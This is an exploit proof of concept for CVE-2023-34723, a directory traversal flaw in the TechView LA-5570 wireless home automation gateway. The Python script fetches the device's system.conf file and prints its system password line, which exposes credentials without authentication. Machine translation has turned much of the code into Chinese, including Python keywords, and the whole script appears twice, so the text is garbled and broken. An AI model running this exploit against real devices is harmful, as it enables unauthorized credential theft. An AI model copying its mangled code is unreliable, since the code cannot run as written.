#利用标题: TechView LA -5570无线网关自动化控制器- 多个漏洞
#Google Dork: N/A
#日期: 25/08/2023
#漏洞作者:安全团队[exploitsecurity.iohttp://exploitsecurity.io]
#供应商homepage3360 https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/la5570
#软件link: n/a
#版本: 1.0.19_T53
#在: MacOS/Linux上测试
#CVE : CVE-2023-34723
#POC代码可用: https://www.exploitsecurity.io/post/cve-2023-34723-CVE-2023-34724-CVE-2023-34725
#!/opt/homebrew/bin/python3
导入请求
导入系统
从时间进口睡眠
从urllib3.ceptions导入Insecurreequestwarning
来自Colorama Import Init
从Colorama进口,背部,风格
导入
导入操作系统
导入iPaddress
requests.packages.urllib3.disable_warnings(category=insecureRequestWarning)
def Banner():
如果os.name=='posix':
clr_cmd=('clear')
elif os.name=='nt':
clr_cmd=('cls')
OS.System(CLR_CMD)
打印('[+] ****************************************************************************
打印('|作者:安全团队|')
print('|公司:'+fore.red+'exploit Security'+style.Reset_all+'\ t \ t \ t \ t |')
打印('|描述: TechView LA-5570目录遍历|')
打印('|用法:'+sys.argv [0]+'target |')
打印('[+] ****************************************************************************
def用法():
打印(f'usage: {sys.argv [0]} target')
DEF MAIN(目标):
域='http://'+目标+'/config/config/system.conf'
TRY:
url=domain.strip()
r=requests.get(url,verify=false,timeout=3)
打印('[+]检索凭据',flush=true,end='')
睡眠(1)
打印('。',flush=true,end='')
睡眠(1)
打印('。',flush=true,end='')
睡眠(1)
打印('。',flush=true,end='')
if(R.Text中的'System_password'):
data=(r.text.split('\ n'))
打印(f'\ n {data [1]}')
其他:
print(fore.red +'[!]目标不脆弱!' + style.Reset_all)
除了TimeOuterRor:
打印(fore.red +'[!]超时连接到目标!' + style.Reset_all)
除了键盘Interrupt:
返回
除了requests.exceptions.timeout:
打印(fore.red +'[!]超时连接到目标!' + style.Reset_all)
返回
如果name=='__ -Main __':
如果Len(sys.argv)1:
横幅()
target=sys.argv [1]
TRY:
veration=ipaddress.ip_address(target)
如果(验证):
主(目标)
除了e:除外
打印(fore.red +'[!]' + str(e) +'!' + style.Reset_all)
其他:
打印(fore.red + f'[ +]没有足够的参数,请指定目标!' + style.Reset_all)
#Google Dork: N/A
#日期: 25/08/2023
#漏洞作者:安全团队[exploitsecurity.iohttp://exploitsecurity.io]
#供应商homepage3360 https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/la5570
#软件link: n/a
#版本: 1.0.19_T53
#在: MacOS/Linux上测试
#CVE : CVE-2023-34723
#POC代码可用: https://www.exploitsecurity.io/post/cve-2023-34723-CVE-2023-34724-CVE-2023-34725
#!/opt/homebrew/bin/python3
导入请求
导入系统
从时间进口睡眠
从urllib3.ceptions导入Insecurreequestwarning
来自Colorama Import Init
从Colorama进口,背部,风格
导入
导入操作系统
导入iPaddress
requests.packages.urllib3.disable_warnings(category=insecureRequestWarning)
def Banner():
如果os.name=='posix':
clr_cmd=('clear')
elif os.name=='nt':
clr_cmd=('cls')
OS.System(CLR_CMD)
打印('[+] ****************************************************************************
打印('|作者:安全团队|')
print('|公司:'+fore.red+'exploit Security'+style.Reset_all+'\ t \ t \ t \ t |')
打印('|描述: TechView LA-5570目录遍历|')
打印('|用法:'+sys.argv [0]+'target |')
打印('[+] ****************************************************************************
def用法():
打印(f'usage: {sys.argv [0]} target')
DEF MAIN(目标):
域='http://'+目标+'/config/config/system.conf'
TRY:
url=domain.strip()
r=requests.get(url,verify=false,timeout=3)
打印('[+]检索凭据',flush=true,end='')
睡眠(1)
打印('。',flush=true,end='')
睡眠(1)
打印('。',flush=true,end='')
睡眠(1)
打印('。',flush=true,end='')
if(R.Text中的'System_password'):
data=(r.text.split('\ n'))
打印(f'\ n {data [1]}')
其他:
print(fore.red +'[!]目标不脆弱!' + style.Reset_all)
除了TimeOuterRor:
打印(fore.red +'[!]超时连接到目标!' + style.Reset_all)
除了键盘Interrupt:
返回
除了requests.exceptions.timeout:
打印(fore.red +'[!]超时连接到目标!' + style.Reset_all)
返回
如果name=='__ -Main __':
如果Len(sys.argv)1:
横幅()
target=sys.argv [1]
TRY:
veration=ipaddress.ip_address(target)
如果(验证):
主(目标)
除了e:除外
打印(fore.red +'[!]' + str(e) +'!' + style.Reset_all)
其他:
打印(fore.red + f'[ +]没有足够的参数,请指定目标!' + style.Reset_all)